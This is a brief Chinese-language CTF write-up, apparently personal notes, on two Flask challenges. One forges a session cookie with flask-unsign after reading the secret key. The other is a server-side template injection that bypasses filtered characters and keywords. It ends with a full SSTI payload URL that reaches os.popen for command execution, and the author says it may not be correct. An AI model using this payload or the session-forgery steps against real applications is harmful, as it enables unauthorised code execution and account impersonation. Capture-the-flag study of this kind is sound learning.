1.flask session伪造

一开始没看出来是flask

flask中特殊变量config.py，其中配置了secret_key来加密构成session，参考：https://www.jianshu.com/p/278d4f59839d

读取文件

flask伪造session的话要安装flask-unsign包

pip install flask-unsign

之后抓包先解码session为明文，用法参考：https://github.com/Paradoxis/Flask-Unsign

明文为

{'username':b'guest'}

伪造

 

2.flask模板注入

直接查看文件的话有过滤

fuzz一下

点号、config、下划线、args被过滤

bypass参考：

https://blog.csdn.net/q20010619/article/details/107553119

https://blog.csdn.net/miuzzx/article/details/110220425

请求方式不对，有空看下错在哪里

http://xmctf.top:8901/?name={{%22%22[request[%22values%22][%22class%22]][request[%22values%22][%22mro%22]][1]request[%22values%22][%22subclasses%22][286][request[%22values%22][%22init%22]][request[%22values%22][%22globals%22]][%22os%22]%22popen%22request[%22values%22][%22read%22]}}